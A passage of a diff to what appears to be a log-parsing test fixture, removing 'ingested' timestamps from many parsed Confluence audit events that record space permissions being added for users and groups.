user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2598,7 +2571,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837480843Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.796Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2691,7 +2663,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837481833Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.785Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2791,7 +2762,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837482827Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.777Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2891,7 +2861,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837483823Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.770Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -2991,7 +2960,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837484745Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.756Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3084,7 +3052,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837485809Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.751Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3184,7 +3151,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837486801Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.744Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3284,7 +3250,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837487829Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.728Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3384,7 +3349,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837489044Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.713Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3477,7 +3441,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837490080Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.705Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3577,7 +3540,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837491086Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.688Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3677,7 +3639,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837491992Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.675Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3777,7 +3738,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837492880Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.668Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3870,7 +3830,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837493796Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.654Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -3970,7 +3929,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837494809Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.644Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -4070,7 +4028,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837495796Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.639Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -4170,7 +4127,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837496963Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.634Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -4270,7 +4226,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837497903Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.628Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -4370,7 +4325,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837498774Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.618Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -4463,7 +4417,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837499719Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.612Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -4563,7 +4516,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837500676Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.606Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -4663,7 +4615,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837501658Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.596Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -4763,7 +4714,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837502553Z",
